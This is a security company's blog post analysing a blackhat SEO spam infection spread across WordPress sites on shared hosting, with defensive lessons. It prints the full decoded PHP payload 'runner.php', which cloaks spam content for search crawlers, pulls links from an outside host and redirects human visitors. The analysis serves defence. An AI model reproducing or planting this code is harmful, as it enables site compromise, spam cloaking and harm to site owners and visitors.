Website Cross-contamination: Blackhat SEO Spam Malware

Mar

2012

We recently posted about Website Cross-Contamination which we see quite a bit of in shared hosting environments. This post is a follow up with a nice sample of an SEO Spam infection that uses multiple sites in a shared environment to push their campaign.

We received a clean up request from a customer who was clearly infected with Blackhat SEO Spam:

We commenced clean up, and discovered they have multiple websites in their hosting environment, all WordPress, and one of the installations was severely outdated running WordPress 3.0.4 (This will come to play later in the post).

As we analyzed the site, we found 1 single line of Eval base64 had been injected into their website theme framework:

At this point we know this isn’t supposed to be there so we decode the string to see what kind of badness it’s inserting into the website, here’s the results:

You may not have caught what was going on because we’ve blanked out part of the path in the image. The eval string when decoded leads back to the payload file named “runner.php”. This file was inserted on another website in the same shared hosting environment.

The important point to take from this is the actual payload file just happens to be on the outdated WordPress instance that we noted earlier, this is not uncommon.

Now we head over to runner.php on the other website to see what we find, this is all sorts of ugly.

The string is huge so we didn’t include the whole thing in the image. Otherwise you would be scrolling down this page for a while.

Looks nasty, right? Well, it is!

$ff_logname = “/home/wp-content/themes/twentyten/languages/en-gb/_log.txt”;$ff_url = “http://”.$_SERVER[‘HTTP_HOST’].$_SERVER[‘REQUEST_URI’];$ff_url_md5 = md5($ff_url);$ff_outlink_file = “http://www.flopex.com/889xsc/links.txt”;$ff_outlinks_count = 10; // count$ff_outlinks_separator = ” |”; // separator$ff_links_count = 5; // + / – count$ff_show_links = 1; // 0 – disabled, 1 – enabled$ff_datetime = date(“j F Y : H i s”);$ff_server_user_agent = @$_SERVER[‘HTTP_USER_AGENT’];$ff_server_referer = @$_SERVER[‘HTTP_REFERER’];$ff_server_host = @$_SERVER[‘HTTP_HOST’];$ff_server_remote_addr = @$_SERVER[‘REMOTE_ADDR’];$ff_server_query_string = @$_SERVER[‘QUERY_STRING’];$ff_server_signature = @$_SERVER[‘SERVER_SIGNATURE’];$ff_server_request = @$_SERVER[‘REQUEST_URI’];$ff_server_ip = @$_SERVER[‘REMOTE_ADDR’];$ff_said = @$_SERVER[‘HTTP_HOST’];function detectBot($ff_server_user_agent, $ff_server_query_string, $ff_server_referer, $ff_server_ip) {$stop_ips_masks = array(”128\.177\.243\.[0-9]+”,”128\.177\.244\.(86|87|88|89|90|91|92|93|94|95|96|97|98|99|100)$”,”141\.185\.209\.[0-9]+”,”169\.207\.238\.[0-9]+”,”194\.112\.94\.(250|251|252)$”,”194\.201\.146\.(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|17|18|19|20|21|22|23|24)$”,”194\.221\.84\.(11|12|13|14|15|16|17|18|19|20|21|22|23|24|25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41)$”,”194\.51\.33\.72″,”199\.177\.18\.9″,”202\.160\.178\.[0-9]+”,”202\.160\.179\.[0-9]+”,”202\.160\.180\.[0-9]+”,”202\.160\.181\.[0-9]+”,”202\.160\.183\.(182|183|184|185|186|187|188|189|190|191|192|193|194|195|196|197|198|199|200|201|202|203|204|205|206|207|208|209|210|211|212|213|214|215|216|217|218|219|220|221|222|223|224|225|226|227|228|229|230|231|232|233|234|235|236|237|238|239|240|241|242|243|244|245)$”,”202\.160\.185\.174″,”202\.165\.96\.142″,”202\.165\.98\.[0-9]+”,”202\.165\.99\.[0-9]+”,”202\.212\.5\.(30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48)$”,”202\.46\.19\.93″,”203\.123\.188\.2″,”203\.141\.52\.(41|42|43|44|45|46|47)$”,”203\.255\.234\.(102|103|104|105|106)$”,”204\.123\.13\.(36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52|53|54|55|56|57|58|59|60|61|62|63|64|65|66)$”,”204\.123\.2\.[0-9]+”,”204\.123\.28\.(10|11|12|13|14|15|16|17|18|19|20|21|22|23|24|25|26|27|28|29|30|31|32|33)$”,”204\.123\.9\.[0-9]+”,”204\.152\.190\.[0-9]+”,”204\.152\.191\.[0-9]+”,”205\.229\.83\.18″,”206\.190\.43\.(81|82|83|84|85|86|87|88|89|90|91|92|93|94|95|96|97|98|99|100|101|102|103|104|105|106|107|108|109|110|111|112|113|114|115|116|117|118|119|120|121|122|123|124|125)$”,”207\.126\.239\.224″,”208\.185\.243\.148″,”208\.221\.32\.[0-9]+”,”208\.221\.35\.(200|201|202|203|204|205|206|207)$”,”209\.1\.12\.[0-9]+”,”209\.1\.13\.(101|102|103|104|105|106|107|108|109|110|111|112|113|114|115|116|117|118|119|120|121|122|123|124|125|126|127|128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143|144|145|146|147|148|149|150|151|152|153|154|155|156|157|158|159|160|161|162|163|164|165|166|167|168|169|170|171|172|173|174|175|176|177|178|179|180|181|182|183|184|185|186|187|188|189|190|191|192|193|194|195|196|197|198|199|200|201|202|203|204|205|206|207|208|209|210|211|212|213|214|215|216|217|218|219|220|221|222|223|224|225|226|227|228|229|230|231|232)$”,”209\.1\.32\.122″,”209\.1\.38\.[0-9]+”,”209\.131\.40\.[0-9]+”,”209\.131\.41\.[0-9]+”,”209\.131\.48\.[0-9]+”,”209\.131\.49\.37″,”209\.131\.50\.153″,”209\.131\.51\.166″,”209\.131\.60\.(19|20|21|22|23|24|25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52|53|54|55|56|57|58|59|60|61|62|63|64|65|66|67|68|69|70|71|72|73|74|75|76|77|78|79|80|81|82|83|84|85|86|87|88|89|90|91|92|93|94|95|96|97|98|99|100|101|102|103|104|105|106|107|108|109|110|111|112|113|114|115|116|117|118|119|120|121|122|123|124|125|126|127|128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143|144|145|146|147|148|149|150|151|152|153|154|155|156|157|158|159|160|161|162|163|164|165|166|167|168|169|170|171)$”,”209\.131\.62\.(107|108|109|110|111|112|113|114|115|116|117|118|119|120|121|122|123|124|125|126|127|128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143|144|145|146|147|148|149|150|151|152|153|154|155|156|157|158|159|160|161|162|163|164|165|166|167|168|169|170|171|172|173|174|175|176|177|178|179|180|181|182|183|184|185|186|187|188|189|190|191|192|193|194|195|196|197|198|199|200|201|202|203|204|205|206|207|208|209|210|211|212|213|214)$”,”209\.185\.108\.[0-9]+”,”209\.185\.122\.[0-9]+”,”209\.185\.141\.[0-9]+”,”209\.185\.143\.[0-9]+”,”209\.185\.253\.[0-9]+”,”209\.191\.123\.33″,”209\.191\.64\.227″,”209\.191\.65\.[0-9]+”,”209\.191\.82\.(245|246|247|248|249|250|251|252)$”,”209\.191\.83\.[0-9]+”,”209\.247\.40\.246″,”209\.67\.206\.(126|127|128|129|130|131|132|133)$”,”209\.73\.160\.[0-9]+”,”209\.73\.162\.[0-9]+”,”209\.73\.164\.[0-9]+”,”209\.73\.174\.(250|251)$”,”209\.73\.176\.(128|129|130|131|132|133|134|135|136)$”,”209\.73\.180\.[0-9]+”,”209\.85\.238\.[0-9]+”,”211\.14\.8\.240″,”211\.169\.241\.21″,”212\.187\.213\.(171|172|173|174|175)$”,”212\.187\.226\.[0-9]+”,”212\.187\.227\.[0-9]+”,”213\.216\.143\.(37|38|39)$”,”216\.109\.121\.(70|71)$”,”216\.109\.126\.(131|132|133|134|135|136|137|138|139|140|141|142|143|144|145|146|147|148|149|150|151|152|153|154|155|156|157|158|159|160|161)$”,”216\.136\.233\.164″,”216\.145\.58\.219″,”216\.155\.198\.60″,”216\.155\.200\.[0-9]+”,”216\.155\.202\.(54|55|56|57|58|59|60|61|62|63|64|65|66|67|68|69|70|71|72|73|74|75|76|77|78|79|80|81|82|83|84|85|86|87|88|89|90|91|92|93|94|95|96|97|98|99|100|101|102|103|104|105|106|107|108|109|110|111|112|113|114|115|116|117|118|119|120|121|122|123|124|125|126|127|128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143|144|145|146|147|148|149|150|151|152|153|154|155|156|157|158|159|160|161|162|163|164|165|166|167|168|169|170|171|172|173|174|175)$”,”216\.155\.204\.40″,”216\.239\.193\.(71|72|73|74|75|76|77|78|79|80|81|82|83|84|85|86)$”,”216\.239\.33\.(96|97|98|99)$”,”216\.239\.37\.(98|99)$”,”216\.239\.39\.(98|99)$”,”216\.239\.41\.(96|97|98|99)$”,”216\.239\.45\.4″,”216\.239\.46\.[0-9]+”,”216\.239\.51\.(96|97|98|99)$”,”216\.239\.53\.(98|99)$”,”216\.239\.57\.(96|97|98|99)$”,”216\.239\.59\.(98|99)$”,”216\.32\.237\.(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|17|18|19|20|21|22|23|24|25|26|27|28|29|30)$”,”216\.33\.229\.163″,”216\.39\.48\.[0-9]+”,”216\.39\.50\.[0-9]+”,”216\.39\.51\.[0-9]+”,”62\.172\.199\.(20|21|22|23|24)$”,”62\.27\.59\.245″,”63\.163\.102\.(180|181|182)$”,”64\.152\.75\.[0-9]+”,”64\.157\.137\.(219|220|221|222|223|224|225)$”,”64\.157\.138\.(103|104|105|106|107|108)$”,”64\.233\.173\.(193|194|195|196|197|198|199|200|201|202|203|204|205|206|207|208|209|210|211|212|213|214|215|216|217|218|219|220|221|222|223|224|225|226|227|228|229|230|231|232|233|234|235|236|237|238|239|240|241|242|243|244|245|246|247|248|249|250|251|252|253|254|255)$”,”64\.68\.80\.[0-9]+”,”64\.68\.81\.[0-9]+”,”64\.68\.82\.[0-9]+”,”64\.68\.83\.[0-9]+”,”64\.68\.84\.[0-9]+”,”64\.68\.85\.[0-9]+”,”64\.68\.86\.[0-9]+”,”64\.68\.87\.[0-9]+”,”64\.68\.88\.[0-9]+”,”64\.68\.89\.[0-9]+”,”64\.68\.90\.[0-9]+”,”64\.68\.91\.[0-9]+”,”64\.68\.92\.[0-9]+”,”64\.75\.36\.(42|43|44|45|46|47|48|49|50|51|52|53|54|55|56|57|58|59|60|61|62|63|64|65|66|67|68|69|70|71|72|73|74|75|76|77|78|79|80)$”,”66\.163\.170\.(157|158|159|160|161|162|163|164|165|166|167|168|169|170|171|172|173|174|175|176|177|178|179|180|181|182|183|184|185|186|187|188|189|190|191|192|193)$”,”66\.163\.174\.65″,”66\.17\.148\.(128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143|144|145|146|147|148|149|150|151|152|153|154|155|156|157|158|159|160|161|162|163|164|165|166|167|168|169|170|171|172|173|174|175|176|177|178|179|180|181|182|183|184|185|186|187|188|189|190|191)$”,”66\.196\.101\.[0-9]+”,”66\.196\.65\.[0-9]+”,”66\.196\.67\.[0-9]+”,”66\.196\.72\.[0-9]+”,”66\.196\.73\.[0-9]+”,”66\.196\.74\.[0-9]+”,”66\.196\.77\.[0-9]+”,”66\.196\.78\.[0-9]+”,”66\.196\.80\.[0-9]+”,”66\.196\.81\.[0-9]+”,”66\.196\.90\.[0-9]+”,”66\.196\.91\.[0-9]+”,”66\.196\.92\.[0-9]+”,”66\.196\.93\.(6|7|8|9|10|11|12|13|14|15|16|17|18|19|20|21|22|23|24)$”,”66\.196\.97\.[0-9]+”,”66\.196\.99\.20″,”66\.218\.65\.52″,”66\.218\.70\.[0-9]+”,”66\.228\.164\.[0-9]+”,”66\.228\.165\.[0-9]+”,”66\.228\.166\.[0-9]+”,”66\.228\.173\.[0-9]+”,”66\.228\.182\.(177|178|179|180|181|182|183|184|185|186|187|188|189|190)$”,”66\.249\.64\.[0-9]+”,”66\.249\.65\.[0-9]+”,”66\.249\.66\.[0-9]+”,”66\.249\.67\.[0-9]+”,”66\.249\.68\.[0-9]+”,”66\.249\.69\.[0-9]+”,”66\.249\.70\.[0-9]+”,”66\.249\.71\.[0-9]+”,”66\.249\.72\.[0-9]+”,”66\.249\.73\.[0-9]+”,”66\.249\.78\.[0-9]+”,”66\.249\.79\.[0-9]+”,”66\.94\.230\.(96|97|98|99|100|101|102|103|104|105|106|107|108|109|110|111|112|113|114|115|116|117|118|119|120|121|122|123|124|125|126|127|128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143|144|145|146|147|148|149|150|151|152|153|154|155|156|157|158|159|160|161|162|163)$”,”66\.94\.232\.[0-9]+”,”66\.94\.233\.[0-9]+”,”66\.94\.238\.51″,”67\.195\.115\.[0-9]+”,”67\.195\.34\.[0-9]+”,”67\.195\.37\.[0-9]+”,”67\.195\.44\.[0-9]+”,”67\.195\.45\.[0-9]+”,”67\.195\.50\.87″,”67\.195\.51\.[0-9]+”,”67\.195\.52\.[0-9]+”,”67\.195\.53\.(111|112|113|114|115|116|117|118|119|120|121|122|123|124|125|126|127|128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143|144|145|146|147|148|149|150|151|152|153|154|155|156|157|158|159|160|161|162|163|164|165|166|167|168|169|170|171|172|173|174|175|176|177|178|179|180|181|182|183|184|185|186|187|188|189|190|191|192|193|194|195|196|197|198|199|200|201|202|203|204|205|206|207|208|209|210|211|212|213|214|215|216|217|218|219)$”,”67\.195\.54\.[0-9]+”,”67\.195\.58\.[0-9]+”,”67\.195\.98\.[0-9]+”,”68\.142\.195\.(80|81)$”,”68\.142\.203\.133″,”68\.142\.211\.69″,”68\.142\.212\.197″,”68\.142\.230\.[0-9]+”,”68\.142\.231\.49″,”68\.142\.240\.106″,”68\.142\.246\.[0-9]+”,”68\.142\.249\.[0-9]+”,”68\.142\.250\.[0-9]+”,”68\.142\.251\.[0-9]+”,”68\.180\.216\.111″,”68\.180\.250\.[0-9]+”,”68\.180\.251\.[0-9]+”,”69\.147\.79\.(131|132|133|134|135|136|137|138|139|140|141|142|143|144|145|146|147|148|149|150|151|152|153|154|155|156|157|158|159|160|161|162|163|164|165|166|167|168|169|170|171|172|173)$”,”72\.14\.199\.[0-9]+”,”72\.30\.101\.[0-9]+”,”72\.30\.102\.[0-9]+”,”72\.30\.103\.[0-9]+”,”72\.30\.104\.[0-9]+”,”72\.30\.107\.[0-9]+”,”72\.30\.110\.[0-9]+”,”72\.30\.111\.[0-9]+”,”72\.30\.124\.(128|129|130|131|132|133|134)$”,”72\.30\.128\.[0-9]+”,”72\.30\.129\.[0-9]+”,”72\.30\.131\.[0-9]+”,”72\.30\.132\.[0-9]+”,”72\.30\.133\.[0-9]+”,”72\.30\.134\.[0-9]+”,”72\.30\.135\.[0-9]+”,”72\.30\.142\.[0-9]+”,”72\.30\.161\.[0-9]+”,”72\.30\.177\.[0-9]+”,”72\.30\.179\.[0-9]+”,”72\.30\.213\.101″,”72\.30\.214\.[0-9]+”,”72\.30\.215\.[0-9]+”,”72\.30\.216\.[0-9]+”,”72\.30\.221\.[0-9]+”,”72\.30\.226\.[0-9]+”,”72\.30\.252\.[0-9]+”,”72\.30\.54\.[0-9]+”,”72\.30\.56\.[0-9]+”,”72\.30\.60\.[0-9]+”,”72\.30\.61\.[0-9]+”,”72\.30\.65\.[0-9]+”,”72\.30\.78\.[0-9]+”,”72\.30\.79\.[0-9]+”,”72\.30\.81\.[0-9]+”,”72\.30\.87\.[0-9]+”,”72\.30\.9\.[0-9]+”,”72\.30\.97\.[0-9]+”,”72\.30\.98\.[0-9]+”,”72\.30\.99\.[0-9]+”,”74\.6\.11\.[0-9]+”,”74\.6\.12\.[0-9]+”,”74\.6\.13\.[0-9]+”,”74\.6\.131\.[0-9]+”,”74\.6\.16\.[0-9]+”,”74\.6\.17\.[0-9]+”,”74\.6\.18\.[0-9]+”,”74\.6\.19\.[0-9]+”,”74\.6\.20\.[0-9]+”,”74\.6\.21\.[0-9]+”,”74\.6\.22\.[0-9]+”,”74\.6\.23\.[0-9]+”,”74\.6\.24\.[0-9]+”,”74\.6\.240\.[0-9]+”,”74\.6\.25\.[0-9]+”,”74\.6\.26\.[0-9]+”,”74\.6\.27\.[0-9]+”,”74\.6\.28\.[0-9]+”,”74\.6\.29\.[0-9]+”,”74\.6\.30\.[0-9]+”,”74\.6\.31\.[0-9]+”,”74\.6\.65\.[0-9]+”,”74\.6\.66\.[0-9]+”,”74\.6\.67\.[0-9]+”,”74\.6\.68\.[0-9]+”,”74\.6\.69\.[0-9]+”,”74\.6\.7\.[0-9]+”,”74\.6\.70\.[0-9]+”,”74\.6\.71\.[0-9]+”,”74\.6\.72\.[0-9]+”,”74\.6\.73\.[0-9]+”,”74\.6\.74\.[0-9]+”,”74\.6\.75\.[0-9]+”,”74\.6\.76\.[0-9]+”,”74\.6\.79\.[0-9]+”,”74\.6\.8\.[0-9]+”,”74\.6\.85\.[0-9]+”,”74\.6\.86\.[0-9]+”,”74\.6\.87\.[0-9]+”,”74\.6\.9\.[0-9]+”,”8\.6\.48\.[0-9]+”,”198\.3\.103\.[0-9]+”,”199\.172\.148\.(11|12|13|14|15|16|17|18|19|20|21|22|23|24|25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52|53|54|55|56|57|58|59|60|61|62|63|64|65|66|67|68|69|70|71|72|73|74|75|76|77|78|79|80|81|82|83|84|85|86|87|88|89|90|91|92|93|94|95|96|97|98|99|100|101|102|103|104|105)$”,”199\.172\.149\.[0-9]+”,”199\.172\.152\.[0-9]+”,”199\.172\.153\.(174|175|176|177|178)$”,”199\.172\.156\.(168|169|170|171|172|173|174|175|176|177|178|179|180|181|182|183|184|185|186|187|188|189|190|191|192|193|194|195|196|197|198|199|200|201|202|203|204|205|206|207|208|209|210|211|212|213|214|215|216|217|218|219)$”,”199\.172\.157\.28″,”204\.62\.245\.[0-9]+”,”195\.145\.119\.(24|25)$”,”198\.5\.208\.[0-9]+”,”198\.5\.210\.[0-9]+”,”202\.33\.250\.(146|147|148|149|150|151|152|153|154)$”,”204\.162\.96\.[0-9]+”,”204\.162\.97\.[0-9]+”,”204\.162\.98\.[0-9]+”,”204\.202\.132\.19″,”205\.226\.201\.[0-9]+”,”205\.226\.203\.(35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52|53|54|55|56|57|58|59|60|61|62|63|64|65|66|67|68|69|70|71|72|73|74|75|76|77|78|79|80|81|82|83|84|85|86|87|88|89|90|91|92|93|94|95|96|97|98|99|100|101|102|103|104|105|106|107|108|109|110|111|112|113|114|115|116|117|118|119|120|121|122|123|124|125|126|127|128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143|144|145|146|147|148|149|150|151|152|153|154|155|156|157|158|159|160|161|162|163|164|165|166|167|168|169|170|171|172|173|174|175|176|177|178|179|180|181|182|183|184|185|186)$”,”205\.226\.204\.238″,”206\.3\.30\.(196|197|198|199|200|201|202|203|204|205|206|207|208|209|210|211|212|213|214|215|216|217|218|219|220|221|222|223|224|225|226|227|228|229|230|231|232|233|234|235|236|237|238|239|240|241|242|243|244|245|246|247|248|249|250|251)$”,”210\.148\.160\.(157|158|159|160|161|162|163|164|165|166|167|168|169|170|171|172|173|174|175|176|177|178|179|180|181|182|183|184|185|186|187|188|189|190|191|192|193|194|195|196|197|198|199|200|201|202|203|204|205|206)$”,”210\.155\.157\.[0-9]+”,”210\.155\.159\.[0-9]+”,”210\.236\.233\.(130|131|132|133|134|135|136|137|138|139|140|141|142|143|144|145|146|147|148|149|150|151|152|153|154|155|156|157|158|159|160|161)$”,”211\.13\.222\.230″,”211\.18\.214\.194″,”212\.185\.44\.(10|11|12|13|14|15)$”,”166\.48\.225\.254″,”202\.232\.118\.(40|41|42|43|44|45|46|47|48|49|50|51)$”,”206\.79\.171\.[0-9]+”,”207\.77\.90\.[0-9]+”,”207\.77\.91\.184″,”208\.146\.26\.[0-9]+”,”208\.146\.27\.(57|58|59|60|61|62|63|64|65|66|67|68|69|70|71|72|73|74|75|76|77|78|79|80|81|82|83|84|85|86|87|88|89|90|91|92|93|94|95|96|97|98|99|100|101|102|103|104|105|106|107|108|109|110|111|112|113|114|115|116|117|118|119|120|121|122|123|124)$”,”209\.202\.192\.[0-9]+”,”209\.202\.193\.[0-9]+”,”209\.202\.194\.(237|238)$”,”209\.202\.205\.1″,”209\.202\.240\.(8|9|10|11|12|13|14|15|16|17|18|19|20|21|22|23|24|25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52|53|54|55|56|57|58|59|60|61|62|63|64|65|66|67|68|69|70|71|72|73|74|75|76|77|78|79|80|81|82|83|84|85|86|87|88|89|90|91|92|93|94|95|96|97|98|99|100|101|102|103|104|105|106|107|108|109)$”,”209\.202\.248\.(211|212|213|214)$”,”209\.67\.228\.[0-9]+”,”209\.67\.229\.[0-9]+”,”211\.51\.63\.4″,”213\.193\.19\.35″,”64\.89\.33\.[0-9]+”,”195\.228\.240\.177″,”204\.166\.111\.29″,”205\.181\.75\.(60|61|62|63|64|65|66|67|68|69|70|71|72|73|74|75|76|77|78|79|80|81|82|83|84|85|86|87|88|89|90|91|92|93|94|95|96|97|98|99|100|101|102|103|104|105|106|107|108|109|110|111|112|113|114|115|116|117|118|119|120|121|122|123|124|125|126|127|128|129|130)$”,”208\.219\.77\.[0-9]+”,”216\.34\.102\.[0-9]+”,”216\.34\.109\.(190|191|192)$”,”64\.95\.79\.(40|41|42|43|44|45|46|47|48|49|50|51|52|53|54|55|56|57|58|59|60|61|62|63|64|65|66|67|68|69|70|71|72|73|74|75|76|77|78|79|80|81|82|83|84|85|86|87|88|89|90|91|92|93|94|95|96|97|98|99|100|101|102|103|104|105|106|107|108|109|110|111|112|113|114|115|116|117|118|119|120|121|122|123|124|125|126|127|128|129|130|131|132|133|134|135|136|137|138|139|140|141|142|143|144|145|146|147|148|149|150|151|152|153|154|155|156|157|158|159|160|161|162|163|164|165|166|167|168|169|170|171|172|173|174|175|176|177|178|179|180|181|182|183|184|185|186|187|188|189|190|191|192|193|194|195)$”,”127\.0\.0\.1″,);$stop_agents_masks = array(”http”,”google”,”slurp”,”msnbot”,”Googlebot”,”Mediapartners”,”Yahoo”,”bot”,”crawl”,”spider”,”robot”,”HttpClient”,”curl”,”PHP”,”Indy Library”,”WordPress”,”Charlotte”,”wwwster”,”Python”,”urllib”,”perl”,”libwww”,”lynx”,”Twiceler”,”rambler”,”yandex”,);$is_human = true;foreach ($stop_ips_masks as $stop_ip_mask) {if(eregi($stop_ip_mask, $ff_server_ip)) {$is_human = false;break;}}if ($is_human) {foreach ($stop_agents_masks as $stop_agents_mask) {if (eregi($stop_agents_mask, @$ff_server_user_agent) !== false) {$is_human = false;break;}}}if ($is_human and !eregi(“^[a-zA-Z]{5,}”, @$ff_server_user_agent)) {$is_human = false;}if ($is_human and strlen($ff_server_user_agent)$is_human = false;}return $is_human;}@$is_human = detectBot($ff_server_user_agent, $ff_server_query_string, $ff_server_referer, $ff_server_ip);//var_dump(@$is_human);if (@$is_human == false) {// – get textif (is_file($ff_basefile)) {$f_arrfile = fopen($ff_basefile, “r”);$f_doors_mas = unserialize(base64_decode(gzinflate(fread($f_arrfile, filesize($ff_basefile)))));fclose($f_arrfile);$decs = hexdec(substr($ff_url_md5, 0, 4));$decs_cof = 65535 / $decs;$decs = (count($f_doors_mas)-1) / $decs_cof;$decs = intval($decs);$ff_ankor = $f_doors_mas[$decs][“name”];$ff_text = $f_doors_mas[$decs][“text”].” ”;}// – run logif (is_file($ff_logname)) {$f_logfile = fopen($ff_logname, “r”);$f_log_mas = unserialize(base64_decode(gzinflate(fread($f_logfile, filesize($ff_logname)))));fclose($f_logfile);$flag_in_mas = 0;foreach ($f_log_mas as $key) {if (in_array($ff_url_md5, $key)) {$flag_in_mas = 1;}}if ($flag_in_mas == 0) {$f_log_mas[] = array(”url_md5″=>$ff_url_md5,”url”=>$ff_url,”ankor”=>$ff_ankor,”referer”=>$ff_server_referer,”ip”=>$ff_server_ip,”time”=>$ff_datetime);$f_logfile = fopen($ff_logname, “w+”);fputs($f_logfile, gzdeflate(base64_encode(serialize($f_log_mas))));fclose($f_logfile);}}else{$f_log_mas[] = array(”url_md5″=>$ff_url_md5,”url”=>$ff_url,”ankor”=>$ff_ankor,”referer”=>$ff_server_referer,”ip”=>$ff_server_ip,”time”=>$ff_datetime);$f_logfile = fopen($ff_logname, “w+”);fputs($f_logfile, gzdeflate(base64_encode(serialize($f_log_mas))));fclose($f_logfile);}// – show linksif ($ff_show_links == 1) {for ($i = 0; $i= 0) {for ($i=$url_pos – $ff_links_count; $i < $url_pos; $i++) {$linklist = $linklist . ” <a href=””.$f_log_mas[$i][“”] .””>”. $f_log_mas[$i][“ankor”] . “</a> “;}}if ($url_pos + $ff_links_countfor ($i=$url_pos + 1; $i$linklist = $linklist . ” <a href=””.$f_log_mas[$i][“”] .””>”. $f_log_mas[$i][“ankor”] . “</a> “;}}$ff_text = str_replace(“{show_links}”, $linklist, $ff_text);$ff_outlink_mas = file($ff_outlink_file);$ff_rand_outlinks = array_rand($ff_outlink_mas, $ff_outlinks_count);foreach($ff_rand_outlinks as $ff_temp => $ff_teklink) {$ff_outlinks = $ff_outlinks .””. $ff_outlink_mas[$ff_teklink] .””. $ff_outlinks_separator;}$ff_text = str_replace(“{out_links}”, $ff_outlinks, $ff_text);echo $ff_text;}exit;}if (@$is_human) {$ff_redir_id = “index”;}if ($ff_redir_id == “index”) {$ff_redir_page = $ff_redir_domen.”?said=”.$ff_said.”&key=”.$ff_server_referer;}else{$ff_redir_page = $ff_redir_domen.”item.php?id=”.$ff_redir_id.”&said=”.$ff_said.”&key=”.$ff_server_referer;}$location = $ff_redir_page;header(“Location: “.$location);exit;}}

Here is a list of the Pharma keyword references used in the original payload.

What this code does is it infultrates the exploited website(s) and replaces things like meta, headlines, and keywords with its choice of Pharma content including links back to malicious ad websites. The challenge here is it will overtake your SERPs overtime, causing all sorts of problems for your visitors, your page rankings, and will likely get you blacklisted.

The long term affects can be devastating for your page rankings as you will likely have to wait for Google to reindex your site which takes a while, and the cached page results may stick around for quite some time potentially driving visitors elsewhere.

Lessons Learned

Keep your websites updated – it is likely this was an automated attack targeting a known vulnerable version of software
Cross-site contamination is real! If you have multiple sites in a shared hosting environment, you’re accepting a hire risk of more than one of your sites being infected if one gets exploited.
Blackhat SEO Spam has long lasting affects. Don’t take it lightly, it’s bad for the internet as a whole, it’s very bad for your users, and extremely painful for you in the long run.
Did I mention you should ensure your software is up-to-date? Oh yah, I did! I can’t emphasize this enough. If it’s outdated, update ASAP. If you don’t need it, remove it now!

Written by Sucuri

0 Comments

The Latest in IT Security

Website Cross-contamination: Blackhat SEO Spam Malware

Lessons Learned

Categories

Featured

Archives

Latest Comments

About Us

Contact Us